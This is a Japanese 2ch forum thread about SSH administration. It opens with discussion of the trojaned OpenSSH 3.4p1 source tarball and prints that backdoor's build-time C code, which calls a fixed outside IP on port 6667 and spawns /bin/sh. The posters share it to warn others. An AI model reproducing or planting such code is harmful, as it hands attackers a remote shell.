SSH その2

SSH に関する情報を扱います。
前スレ: http://pc.2ch.net/test/read.cgi/unix/976497035/

関連リンク集(前スレより)
本家SSH: http://www.ssh.com/
(日本語) http://www.ipsec.co.jp/products/ssh/
OpenSSH: http://www.openssh.com/ja/
OpenSSH 情報: http://www.unixuser.org/~haruyama/security/openssh/
OpenSSH マニュアル: http://www.unixuser.org/~euske/doc/openssh/jman/
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/
(PuTTY日本語版): http://hp.vector.co.jp/authors/VA024651/
(PuTTYスレ) http://pc.2ch.net/test/read.cgi/unix/1014702733/l50
TTSSH: http://www.zip.com.au/~roca/ttssh.html
MacSSH: http://www.macssh.com/
WideのSSH解説: http://www.soi.wide.ad.jp/class/20000009/slides/12/
IETF SecSH Protocol: http://www.ietf.org/html.charters/secsh-charter.html
SSH FAQ: http://www-vacia.media.is.tohoku.ac.jp/~s-yamane/FAQ/ssh/ssh-faq.html
PortForwarder: http://portforwarder.nttsoft.net/JP/
VNC on SSH: http://www.uk.research.att.com/vnc/faq.html
Tramp: http://ls6-www.informatik.uni-dortmund.de/~grossjoh/emacs/tramp_ja.html
おまけ・Theoのキチガイぶり: http://pc.2ch.net/test/read.cgi/unix/1023635938/546-550

ついでにコレも：
(TTSSH日本語版): http://www.sakurachan.org/soft/teraterm-j/ttssh/

portable版3.4p1にトロイの木馬ですか。。((;ﾟдﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>4
某サーバの6667につないで/bin/shしてるよーな、そんな感じ。
＜トロイ

>>4
詳細＆ソースぷりーず

>>6
だいじょぶなやつ
837668 bytes
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

ダメなやつ
840574 bytes
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

せっかくだからageときましょ

>>7
ダメなやつってopenssh.comが配布してたの?
それともmirrorのふりしてニセモノつかませてたサイトがあったとか?

>>9
さっき、マスターサイトから取得したら、ダメファイルだたよ…。
おそらく出回ってるミラーも、現在は危険でしょう。

いつごろからダメファイル設置されていたんでしょう？

http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

参考までに、ビルド時に生成されて実行されるコード:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void sig(int sig){
close(s);
sleep(3600);
longjmp(env, 0);
} int main() {
int x;
char c, *a[2];
struct sockaddr_in sa;
struct sigaction act;
switch (fork()) {
case 0:
break;
default:
exit(0);
} close(0);
close(1);
close(2);
memset(&act, 0, sizeof(act));
act.sa_handler = sig;
sigaction(SIGALRM, &act, NULL);

do {
setjmp(env);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("203.62.158.32");
alarm(10);
if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
exit(1);
if ((x = read(s, &c, 1)) == (-1)) {
exit(1);
} else if (x == 1) {
switch (c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
a[0] = i_val;
a[1] = NULL;
execve(a[0], a, NULL);
break;
case 'M':
alarm(0);
sig(0);
break;
default:
}
} else {
exit(0);
}
} while (1);
}

i_val はすなわち "/bin/sh" ね。

ftp.u-aizu.ac.jp でダメファイルを確保しますた。
Ring はどうよ?

ring は OpenSSH のミラーしてないみたい。
うちでは /usr/ports/distfiles/ にだいじょうぶなやつがあったんで、
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ を調べたが、
ftp> dir openssh*
150 Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 1006 1006 330665 May 1 2001 openssh-2.9.tgz
-rw-r--r-- 1 1006 1006 662590 Jun 17 2001 openssh-2.9p2.tar.gz
-rw-r--r-- 1 1006 1006 363849 Nov 14 2001 openssh-3.0.1.tgz
-rw-r--r-- 1 1006 1006 780980 Nov 15 2001 openssh-3.0.1p1.tar.gz
-rw-r--r-- 1 1006 1006 364230 Mar 29 04:51 openssh-3.0.2.tgz
-rw-r--r-- 1 1006 1006 781092 Mar 29 04:51 openssh-3.0.2p1.tar.gz
-rw-r--r-- 1 1006 1006 9071 May 10 06:47 openssh-3.1-adv.token.patch
-rw-r--r-- 1 1006 1006 367903 Mar 6 00:43 openssh-3.1.tgz
-rw-r--r-- 1 1006 1006 9203 May 10 06:47 openssh-3.1p1-adv.token.patch
-rw-r--r-- 1 1006 1006 803104 Mar 7 02:41 openssh-3.1p1.tar.gz
226 Transfer complete.
残念、まだミラーされてなかった模様。

ftp://ftp.ring.gr.jp/pub/OpenBSD/OpenSSH/portable/

ここのは正常だったよ。

ring でも /pub/OpenBSD/OpenSSH/portable/ にあると思いますが、
毒入りかどうかは未確認(たぶんまだかな)。
すでに毒がまわっている OpenBSD のミラーもいくつかあるようです。

ftp.u-aizu.ac.jp には大丈夫な奴とダメな奴の
両方があるみたいだね。ダメファイルは多分

/pub/net/security/ssh/openssh/portable

の方。

>>12
これはOpenBSDでコンパイルするときがヤバイってこと?

see http://www.mavetju.org/weblog/weblog.php

>>19
いくつかの Ring サーバで /pub/OpenBSD/OpenSSH/portable のを
調べたけど大丈夫だった

Ring サーバって OpenBSD 自体が無いところもいくつかあるね。
近い ring.ocn.ad.jp には無かったよ。(´･ω･`)ｼｮﾎﾞｰﾝ

bf-test.cそのものは単にソース吐いてるだけか...

で，この原因はftp.openbsd.orgがcrackされたということなの？

>>26
実は Theo たんが…

おまいらportable版なぞ使わずOpenBSDを使え! っすか? (((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>26

たぶんそう。
てことは、ssh だけじゃなくて、OpenBSD 本体の方も、書換えが
行なわれてないか調べる必要があるわけだが...

こういう時って、ftp.openbsd.orgの中身は全て信頼できないものと見なさな
いと危険だよね。
CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

misc@に流れたAdvisoryのapplication/pgp-signatureがdemimeされていてちょっとワラタ

> CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

その筈なんだが、もし ftp.openbsd.org で root も盗られていて、しかも
ftp.openbsd.org と cvs.openbsd.org で共通にアカウントを持つ人間がいた
りすると、結構やばい。
この前の monkey.org の件でも、同じ心配があるな。

OpenBSDは、どうなってしまうんだろう。。。

別にどうもならん。

>>33
セキュリティが唯一の取り柄のOSだったのに、
マトモな人なら使うの止めるだろうなぁ。

誰かまぬけな俺に教えてくれ。 どうして ftp.openbsd.orgは > 220 merlin FTP server (SunOS 4.1) ready. なのですか? ひょとして、トロイ埋め込まれたのはOpenBSDのせいじゃないんじゃ?

あれ?
改行が通らねえ…見苦しくてスマソ。

>>36
http://www.openbsd.org/faq/faq8.html#wwwsolaris

いよいよdjbsshの出番d(略

Theoがなにも考えずに3.4にあげろっていってたのはこのためか。

危険なのでage

　　　　　　　　　Theoワッショイ！！
　　　　　＼＼　 Theoワッショイ！！　／／
　+　　　+　＼＼　Theoワッショイ！！／+
　　　　　　　　　S　　　　S　　　　H　　　　　+
.　　　+　　 ／□＼　　／□＼　 ／□＼　　+
　　　　　　（　´∀｀∩（´∀｀∩）（　´ー｀ ）
　+　　（(　（つ　　　ノ（つ　　丿（つ　　つ　)）　　+
　　　　　　 ヽ　 （　ノ　（　ヽノ　　）　）　）
　　　　　　　（＿）し'　し（＿）　（＿）＿）

毒を仕込んだの、実はTheo

>39 マヂであったら欲しい。

問題のweb.snsonline.net って、何奴？

単なるホスティングサービスだろう。
今は動いてないようだが、たぶん不要なircdが動いてるのを利用されたんだろう。

Theo尊師祭りのところすみません。
OpenSSLを上げたら
debug1: ssh_dss_verify: signature incorrect
と出てpublickey認証が通らなくなっちゃったんですが、何かご存知の方おしえてください。
よろしくおながいします。

自己レスすんません、gcc-2.95.2.1で-funroll-all-loopsつけるとダメだったみたいです、 make testも通りませんでした。-funroll-all-loopsを外したら通りました。

cvs.openbsd.org が疑われているようです…

げげ〜。cvs リポジトリ全体が信頼できないとなると、OpenSSH だけじゃなく
OpenBSD 全体がかな〜りやばいことにならんか?

もうだめぽ

OpenSSHがんばってくりっちょ！

Solaris9についてる
Sun SSHってどーよ？
一応OpenSSHベースらしいが、
どのくらい違うのでしょう。

O　p　e　n　B　S　D　落　日　の　日　迫　る！　！　！

>>53
俺も普段 Solaris 使ってないから分からないけど、
心配なら本家から porting されてる OpenSSH 使えば?

>>54
マジだとしてマジレスするとちょっと残念だな。

今回の件は、べつにOpenBSD自体の脆弱性が呈されたわけでもなんでもないでしょう。

ところで前から気になってたんだけど、おなじディレクトリに .md5置いとくのって、
あんまり意味ないよね。(それとも、crack対策じゃなくて、ファイルが壊れてないかどうかの検証用なのかな？)

ftp.openbsd.org anonymous ログインできないでつ...

>>57
OpenBSD「プロジェクト」の脆弱性ははっきりしたのは確か

>>59
そういう考え方もあったかー。

でも、問題のsunsiteなんとか切れば、というか使うのやめたらそれで
おしまいな話なんじゃないの？

>>60
monkey.org の方は openbsd 使ってたんじゃないの?

>>61
それって単にミラーリングで伝播しただけってのとは違うの？

(といっても、monkey.orgってのがどんな代物かも知らないのですが...詳細きぼん。)

> それって単にミラーリングで伝播しただけってのとは違うの？

sshの件とは関係ない。

> 詳細きぼん

bugtraq と monkey.org を指定して google で探すと、最初に出てくるぞ。
monkey.org は、OpenBSD の committer がやっているサイトね。

しまった、保存する前に前スレがdat落ちしてしまったよ…ウワァァン
誰か前スレ保存している方いらっしゃいませんか？

途中までなら
http://www.google.co.jp/search?q=cache:hihesdfKKgsC:pc.2ch.net/test/read.cgi/unix/976497035/+&hl=ja&ie=UTF-8

http://www.42ch.net/UploaderSmall/source/1028571690.dat
bzip2でし

>>65
ありがとうございます。…しかし、見たい部分はさらに後の方にあるようです…

>>66
おおおおおー！拡張子をbz2に変更して解凍したら見ることができました。
# 「不完全な」HTMLファイルといったｶﾝｼﾞですな

>67
http://www.skipup.com/~niwatori/index3.htm#dat

いまさらだけど、

http://130.158.36.68/~pooh/ssh.html

で、春山さんのトコに過去ログHTML置いてくれると嬉かったり…。

>>68
えぇ、知っております。しかしID登録する気はないので(苦笑)、>>64を書いたので
した。

>>70
同意です！！

読めないdat落ちスレのミラー作ります
http://ton.2ch.net/test/read.cgi/gline/1026576001/

http://www.unixuser.org/%7Eharuyama/security/openssh/dat/pc.2ch.net_80__unix_dat_976497035.html
に
http://www.moonwolf.com/ruby/のdat2html.rbで変換したものを置きました。

OpenSSH は theo と OpenBSD とともに入滅の時を待っています。

OpenSSHが死んだらつぎはFreSSHかねえ

>>75
意味わかんね。

>>73
春山さん、ありがとうございます!!(m__m)

>>76
ttp://www.fressh.org

>>78
あ、そういうのがあるんね。無知でｽﾏｿ。

>>57
md5って壊れてないかどうかのチェック用で、
crack対策はPGPやGPGの署名を使えばいいんじゃない?

>>80
まあパッケージ一つ一つを署名するのは面倒な作業だと思うけど、
sshとかのセキュリティ関係のプログラムだけ署名するなら現実的ですね。
今度は「この署名は正しいようだが、これを署名した人間は本当に
信用出来るのか？」という問題が出てくるから、それなりの人物の署名でないと
意味が無いので…

opensslが0.9.6gになってるんだけど、ちゃんとopensshもmakeしなおしましたか？

>>82
し直さないとダメなんでしょうか？　ダメなんですよね、きっと。
その場合って、openssh を make distclean とかする必要あります？

>>82
漏れは openssl を shared でコンパイルしてるから、ssh は
再起動しただけですが何か？
ssh -V
OpenSSH_3.4p1, SSH protocols 1.5/2.0, OpenSSL 0x0090607f

ldd /usr/sbin/sshd
してみたら、たしかにsharedでリンクされてるんだけど、
libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000)
これで,
ls -al /usr/lib/libcrypto.so.3
で見てみると古いライブラリなんですよね。
あたらしいやつは
/usr/lib/libcrypto.so.2
みたい。やっぱりmakeしなおしですか？
一応再起動してみたけど、
/usr/lib/libcrypto.so.3
にリンクされてたもんで・・・

>>85
犬板とクロスポストかよ おめでてえな

>>85
libcrypto.so.3 がライブラリの実体なんですか？
別のファイルのシンボリックリンクだったりしません？
私の所では、libcrypto.so.0.9.5a のリンクで、
そちらのタイムスタンプはアップデート後のものになってました。

libcrypto.so.3 はライブラリの実体でした。
libcrypto.soはlibcrypto.so.2にシンボリックリンクになってます。
きっとopensslをmakeする前はlibcrypto.soはlibcrypto.so.3にシンボリックリンクされてたんだと思います。

OpenSSHをmakeするときに、libcrypto.soにリンクしてくれればいいのに。。。

elfのmajorの話と混同してないか？

openssl 0.9.6c を make install している最中に sshd が落ちた…。
openssl の Makefile は libcrypto.so.0.9.6 を上書きしちまうのか?
また 0.9.6e でも同じことをせんように気をつけねば。

0.9.6e じゃなくて、0.9.6gにしとけ >> 90

堅い方法だと、singleに落としてmake installするしかないのかな

このへんの正しいインストール手順きぼんぬ。

>>90 上書きしてくれなきゃバージョンアップの意味ないのでわ？ ちなみに、shared を置き換えて daemon が落ちるのはごく普通。

FreeBSDだとlibcrypto.so.2　で、Solarisだとlibcrypto.so.0.9.6 になってるなぜ？

>>92
network 経由じゃそれをやるのは不可能に近いからねぇ。それをやろうとすると
Terminal server を用意して…とかいうことになる。

>>94
一番悪いのは version number の持つ意味をなかば無視して 0.9.6 のまま固定
しちゃっていることだけど、Makefile のほうも古い library を mv して
mv libcrypt.so.0.9.6 libcrypt.so.0.9.6-old してから新規 library を
libcrypt.so.0.9.6 として install してくれれば、とりあえず被害はある程度は
収まる。

openssl の config や Makefile ってかなり腐っているな…。
config --prefix=/usr/local --openssldir=/usr/local/ssl ってやっても
意図通りに install されないんで Makefile 見たら萎えた。

とっとと autoconf に移行しろよ…。

>>97
まずあり得ないと思われ

autoconfってGPL/LGPL縛りあるんでない？

>>98
configureやconfig.*のコメント見てみ。縛りは無いYO。

　┌─────────┐
　│ 　　　　　　　　　　 　 　.|
　│　 100get　 　│
　│ 　　　　　　　　　　 　 　.|
　└―――──――――┘
　　　　　　ヽ(´ー｀)ﾉ
　　 　 　　　 (　 へ)
　 　 　 　 　　く

FreeBSDを今日のSTABLEにしたらKeyChainが動かなくなってしまいった。
一週間前にSTABLEでは大丈夫だった。
portsからインストールした1.9
起動時にこんなエラーが。

/usr/local/bin/keychain: 244: Syntax error: "||" unexpected

OpenSSL関係かな？

>>101
OpenSSHそのものとは無関係

/bin/shでの文法の解釈が微妙に変わった副作用だな

詳しくはこのへん参照
http://pc.2ch.net/test/read.cgi/unix/1028052350/211

>>102
そうですか。
KeyChain側で対応すべき問題なのかな？

>>101
http://www.freebsd.org/cgi/query-pr.cgi?pr=40386

♯お約束？

>>103
> KeyChain側で対応すべき問題なのかな？

だからどうして keychain なぞを使わにゃならんのかと小一時間…

>>105
自分が自宅で使うマシンで、keychainが便利だから。

>>101は
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=2169031+0+archive/2002/cvs-all/20020811.cvs-all
まで辿り着けたのでせうか。

>>107
あら、/bin/sh側に修正入ったのね。
17日にMFCかかったらCVSupするか…。

freebsd4.5Rを使ってますがsshd_configで
AllowUsers user1 user2
特定のユーザであり特定のip addrからのみssh接続許可したいのですが
どうすれば良いのでしょうか？

>109
tcpd

>>109
> freebsd4.5Rを使ってますがsshd_configで
> AllowUsers user1 user2
> 特定のユーザであり特定のip addrからのみssh接続許可したいのですが
> どうすれば良いのでしょうか？

AllowUsers を知っていながらこういう質問が出るってことは OpenSSH
2.9p1 辺り？

3.Xp に上げれば

AllowUsers user1@ip1 user2@ip2

で逝けるだろう。

>>109
PasswordAuthentication no にして、鍵認証だけを
許可するって方法もあるです。AllowUsers の方が
楽だけど。

>>111
初めて知ったっ！ありがとうございます！

> 3.Xp に上げれば
>
> AllowUsers user1@ip1 user2@ip2
>
> で逝けるだろう。

うーん、アナウンスメールでの変更内容見てもこれに関する記述はなかった
なぁ…。

ChangeLog見てみるかな…。

あー、ちなみに、3.0.2p1にはその機能はなかったですね（3.0.2までのChangeLogは
読んだ）。ということは3.1以降ですね。


量が多くて大変だが見てみっか！ゴルァァァァ

>>114
> あー、ちなみに、3.0.2p1にはその機能はなかったですね（3.0.2までのChangeLogは
> 読んだ）。ということは3.1以降ですね。

あー、そーなんだー。手元には 2.9 と 3.1 以降しかなかったんで気
付かず 3.X ってかいちまったっす。

> 量が多くて大変だが見てみっか！ゴルァァァァ

ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と
3.[1-4] とで見比べてみる方が早道。

> ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と

もちろん、

< ChangeLog より、直截的に auth.c の allowed_user() 辺りを 2.9 と

ね。

♯いかん、最近この手のミスが多いな。

あと match.c と。

レスどうもです。

>>115
>>116
　アドバイスありがとうございます。見てみます。

# 最初>>116でおっしゃっている意味がさっぱり分からなかったんですが、今
# もう一回見たらやっと分かった…allowd_user()ではなく、allow*e*d_user()
# なわけですね。

ちなみに、3.0.2p1のマニュアルにはこういった記述はないですが、3.4p1のマニュアル
（日本語訳はhttp://www.unixuser.org/~euske/doc/openssh/jman/sshd_config.html参照）
にはバッチリ書かれてますね。

opensshを最新にしたらps ax
sshd: user [priv] (sshd)
sshd: user@ttyp0 (sshd)
でこうなるんですがこれで正常なんですよね？

ChangeLogをざっと眺めてみたけど、これだ!というのが見つからなかったです…。
それらしきものは以下の部分かなぁ…。

20020304
　- OpenBSD CVS Sync
　　 - [email protected] 2002/02/28 19:36:28
　　 [auth.c match.c match.h]
　　 delay hostname lookup until we see a ``@'' in DenyUsers and AllowUsers
　　 for sshd -u0; ok markus@
　　 - [email protected] 2002/02/28 20:36:42
　　 [sshd.8]
　　 DenyUsers allows user@host pattern also


で、3.1p1のsshd.8を見てみたら件のUSER@HOSTに関する説明が追加されているのを
確認しますた。sshd.8のAllowUsersオプションに関する部分より：
all users. If the pattern takes the form USER@HOST
then USER and HOST are separately checked, restricting
logins to particular users from particular hosts.

さらに、>>115と>>116で述べられていたソースコードを見てみますた…ざっと見
たところ、最終的にはmatch.cのmatch_user()関数に行き着くようですね。で、この
関数は2.9p2→2.9.9p2で追加されたようです。
　2.9p2: RCSID("$OpenBSD: match.c,v 1.12 2001/03/10 17:51:04 markus Exp $");
2.9.9p2: RCSID("$OpenBSD: match.c,v 1.14 2001/06/27 04:48:53 markus Exp $");

…で、2.9.9p2の配布ファイルのChangeLogを見てみると、該当個所ハケーン：
20010704
　- OpenBSD CVS Sync
　　- [email protected] 2001/06/27 04:48:53
　　 [auth.c match.c sshd.8]
　　 [email protected]

んなの分かるかヴォケェェェ！！！！！！きちんと説明書けやゴルァァァ！

結論：
機能そのものは2.9p2→2.9.9p2で追加され、マニュアルでの記述は3.0.2p1→3.1p1で
追加された。

>>120
> さらに、>>115と>>116で述べられていたソースコードを見てみますた…

乙渇れー。

> んなの分かるかヴォケェェェ！！！！！！きちんと説明書けやゴルァァァ！

つーこって、“Use the source, Luke”なんだ罠、やっぱ。

>>118
ttp://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt

>>122
いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね？>>122さ
んをはじめ、他の人のアドバイスきぼんぬ。

あと、話の腰を折る気は全くないんですが（本当ですっっ）、“Use the source, Luke”
って何なんですか？元ネタはopenssh-unix-dev？

s/source/force/
Luke = Skywalker

May the source be with you.

>>124
> いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね？>>122さ
> んをはじめ、他の人のアドバイスきぼんぬ。

正しいっす。

たしかに 2.9.9 から allowed_users() が match_pattern() を直接
じゃなくて match_user() を引数に hostname と ipaddr を追加し
た上で呼び出すようになり、match_user() のなかで user を '@'
で分割した上で前者を match_pattern()、後者を match_host_and_ip()
でそれぞれマッチするかどうかチェックするようになってますね。

実際に試しちゃいないけど、このコードなら 3.4 の man page に書
いてあるのと同じ動作をする筈。

ただ、開発者でもなんでもないおいらの話はもとより、開発者本人
のにしろその言を信じるってのは、『1 (ヵ月|週間|日|時間|分|秒)
前の自分は他人』の法則に則る限りお奨めできない。

ドキュメントや開発者本人がなんと言おうと、プログラムはソース
に書かれている通りにしか動きまへん。コードと自分の目を信じま
せう。

で、“Use the source, Luke”に関してはすでにいくつかフォローが
あるけど、このフレーズでぐぐってみればいろいろ当たるっす。なか
でも

ttp://burks.brighton.ac.uk/burks/foldoc/61/122.htm

辺りの説明が的確かしらん。

openssh にかぎらず、ドキュメンテーションって openbsd では
わりとおざなりにされてるような気がする。

/home/hoge/.ssh/authorized_keysとファイルを作ったのですが、
hogeのパーミッションを706とかにすると、
Authentication refused: bad ownership or modes for directory /home/hoge
とエラーが出てしまいます。
705だとログイン出来るのですが、その他ユーザの権限として書き込みの権限(2)を与えてはいけないんでしょうか。

>>129
少なくとも、好ましいことではないな。

>>129
sshd_configのStrictModesで挙動を変えられるが
お勧めはしない。

>>129
authorized_keysの中に勝手に鍵を追加されたりしたら、
誰でもあなたになりすますことができちゃいますよ。

>>132
いや、必ずしもauthorized_keysの内容が変更されるとは限らないYO！

>>129ではホームディレクトリ（/home/hoge）のパーミションの話はしているが、
~/.sshや~/.ssh/authorized_keysのパーミションについては何も言ってないから
な。

ホームディレクトリのパーミションを調べているのは、~/.[rs]hostsが関わってく
るからでしょう。ホームディレクトリが所有者以外に書き込み権限を与えられていた
ら、その権限を利用して~/.[rs]hostsを書き換えられる可能性があるからな。（直接
編集はできなくても削除→作成という手順で結果として書き換えることは可能）

>>129
ssh以外の部分でもいろいろ問題が出てくる（例：~/.profileとかも~.[rs]hostsと同様
書き換えられることになる）んだから、所有者以外に書き込み権限を与えるのは
やめとけ。

>>127
フォローThanksです。すなわち、ドキュメントとか見るより（そしてUsenetとかで
質問するより）実際にソースコードを読んだ方が早いYOってことね。

皆さんありがとうございました。
確かに自分以外に権限を与えるのは危険ですね…。
参考になりました。

>>134
>>126 (B-)

♯“方が早い”というよりは“方が確実だ”かな。結局全然早くない
♯ことも多い。

前スレの910さん、遅くなりましたがQandA変更しておきました。
ttp://home.jp.FreeBSD.org/cgi-bin/QandA/readmail.cgi/QandA-work/5481

SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか？

>>138
Man in the middle attack について調べてきましょう。

>>139
> Man in the middle attack について調べてきましょう。

MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
とまた話は別だが)。

いちばん大きな差はやっぱ integrity check の部分だろうね。SSH2は
CRC なんていい加減な方法ではなくちゃんとした MAC を用いているの
で、CORE SDI の insertioin attack に類似した型の攻撃が成立する
ことはほぼ不可能になってる (これ実は SSH1 でも成立しない筈なん
だけど)。

>>140
> MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
> される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
> ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
> とまた話は別だが)。

ｽﾏｿ。この部分、嘘だった。正しくは

< MITM に関しては SSH1 も SSH2 も等価。ユーザ認証に公開鍵暗号を使っ
< ていれば一発目から検出可能。

だな。PKI 云々もあんま関係なかった。

ぐぐってみたらここの過去ログが出てきたよ〜 回線切って...
の前にスレの202あたりが結論って事でいいんでしょうか

> SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか？

mitm 以外にも、DH 鍵交換を使っているので、より安全。
と、されている。

>>142
> ぐぐってみたらここの過去ログが出てきたよ〜 回線切って...
> の前にスレの202あたりが結論って事でいいんでしょうか

どれどれ、見てみよう…。って、なるほど、この辺りが『SSH1 じゃダ
メだけど SSH2 なら MITM に対抗できる』という誤認識が普及した始
まりなわけね。

で、さらにそっから孫引用されている記事

http://sysadmin.oreilly.com/news/silverman_1200.html

も読んでみると、、、おい、この記事書いたの snail book の著者じゃ
ねーか。何考えてんだか。自分の本の記述と矛盾してるやん。

　In both SSH-1 and SSH-2, the key exchange is so designed
　that if she does this, the session identifiers for each
　side will be diferent.

Snail book (SSH The Secure Shell The Definitive Guide) p102 よ
り。“diferent”というスペルミスは原文ママ。引用文中の“this”っ
てのが MITM のこと。

で、正解は snail book の記述の方ね。

つーこって、誰が書いたものだろーとウェブ上の解説なんぞを信じる
とイタい目に逢うという新たな実例なんだ罠。

RTFS。

やっぱり夏はカレーだよね。

夏カレー
乙カレー
うな重

ユーザ sshd ってなんに使うんでしょう?
FreeBSD-stable 上の openssh 3.4p1 ですが、
ps をとっても見当たらないし。

# FreeBSD 質問スレの方がよかったかな

>>147
http://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt

ありがと & ガイシュツすまそ。
認証時に一時的に使われるんですね。ps とって確認しました。

authorized_keys の中にめちゃくちゃ鍵がたまってきてます。
もう使わないホストの公開鍵もあるはずなんですが、
どれがどれやら…

それぞれの鍵がいつ最後に使われたかを記録してくれるといいんですけどね。
みなさん、authorized_keys は太りすぎていませんか？

known_hostsじゃないの?
authorized_keys は使いまわすので1つか2つしか入れてないが…

>>151 いや、各ホストですべて異なる鍵を ssh-keygen してるもんだから…
そうか、普通は異なるホストで全部異なる鍵ペアを作ったりしないのか…　鬱死

ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル　ってできます？
-i オプションで SSH2 → OpenSSH はできるみたいなんだけど。
OpenSSH 3.4p1　を Debian GNU/Linux と cygwin で使用中。

>>152
いや、ホストごとに ssh-keygen するもんでない?
キーのコメント (メールアドレス) で区別できない?

すみません、かなりDQNな質問はこちらでは可能でしょうか?
まだ自分でｻｰﾊﾞｰを立て始めて勉強している最中なのですが、
sshでﾘﾓｰﾄからpublic key認証でﾛｸﾞｲﾝしようとすると、

"No further authentication methods available."
No more authentication methods available.

と言われ、ﾛｸﾞｲﾝできません。
使っているｸﾗｲｱﾝﾄはSSH Secure Shell Client3.2.0.0(ちと古いですが）
ｻｰﾊﾞｰにはopenssh-3.1p1-3(RedHat7.3上にて)なのですが。

色々調べてみたのですが、ｸﾗｲｱﾝﾄでｼﾞｪﾈﾚｰﾄしたpublic keyを
ｻｰﾊﾞｰ上のhome/****/.sshにｱｯﾌﾟして、
ssh-keygen -i -f ******.dsa.pub >> authorized_keys2でｺﾝﾊﾞｰﾄ
しろ、という方法がSSHのFAQに出ていたので試してみたのですが、
さっぱりﾀﾞﾒでした。
何がいけない点なのかが、全くわかりません。。。
ものすごい厨房な質問で申し訳ないのですが、どなたか、ﾋﾝﾄを下さい。。。

> ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル　ってできます？

できます。
ssh-keygen -i -f ssh_com_pubkey → openssh_pubkey
ssh-keygen -e -f openssh_pubkey → ssh_com_pubkey

> さっぱりﾀﾞﾒでした。
> 何がいけない点なのかが、全くわかりません。。。

こっちも同感です。それだけの情報じゃね。

>>155　ありがとうございます。 -e オプションですか。
SECSH Public Key File Format に変換すればよかったんですね。

>>154　サーバ (sshd) のログを見てみると解決するかもしれませんよ。
あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか？

>>154
そのバージョンってauthorized_keys2の2は必要?

>>158
2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
「authorized_keys*2*でも可能」ということになっていると思うが、どうかな？

そのあたりの事情に詳しい人のフォローきぼん

>>157
> あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか？

>>154 によるとクライアントは ssh.com 版らしいので、ssh -d 3 く
らいかな。

んで、まさかクライアント側で ~/.ssh2/identification を作ってい
ない、とかいうオチではないよね？

>>159
> 2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
> 「authorized_keys*2*でも可能」ということになっていると思うが、どうかな？
>
> そのあたりの事情に詳しい人のフォローきぼん

正確には『より新しい』じゃなく『以降の』バージョンでは、って
ことになるが、それ以外はその通り。

この辺りの措置は user_key_allowed という関数で行なわれるんだけ
ど、この関数、2.9.9 〜 3.4p1 では、まず authorized_keys を試し、
それでうまく行かなかったら authorized_keys2 を試すようになって
いるようだ。

>>161
> 正確には『より新しい』じゃなく『以降の』バージョンでは、って
> ことになるが、

おっとっと、たしかにそうですね。

> この辺りの措置は user_key_allowed という関数で行なわれるんだけ
> [...]

なるほど、参考になりますた。んじゃ、それを元にソースのdiffをとったり
してみるYO!!　Thanks!!

厨な質問ですみません。
パスフレーズを使用せずに、パスワードで認証を行う場合でも
そのパスワードは暗号化されているのですか？

RTFAQ

↑つまんねーよ。

>>163
もう何度も出てきた質問でうんざり。ssh接続が確立した
時点で暗号化はされているので、パスワードも暗号化され
ている。

>>166　おそらくその「ssh接続が確立した時点」というのが正確に理解されていない場合が多いと思われ。
「認証が通った時点」と勘違いしている人もいるんだよね。

>「ssh接続が確立した時点」
>「認証が通った時点」
だっからどう違うの。おせえて、おせえて、おせえて

ssh -vして何が起きているのか眺めてください

sniff してみりゃいいじゃん。

>>168　TCP コネクション確立直後に、ホスト（サーバ）とクライアントの間で、ホスト鍵（各 sshd に固有の鍵、通常は sshd をインストールした時点で生成されて、それ以後は変更されることはない）の確認をする。
これによってホストがいつの間にか別のマシンにすりかえられていたりした場合に検出できる。
もしホスト鍵が以前そのホストに接続した時のものと異なっていたときには、警告される。

この時点で、以降のデータのやり取りを暗号化するための共通鍵が交換される。以降のデータのやり取りは、すべて暗号化される。いわゆる公開鍵暗号＋共通鍵暗号ハイブリッド方式。

いくつかある認証を試すのは、これ以降の話。たとえば「ユーザ名＋パスワード」による認証の際のデータも、すべて暗号化される。なので、安心。

>>171　なので、
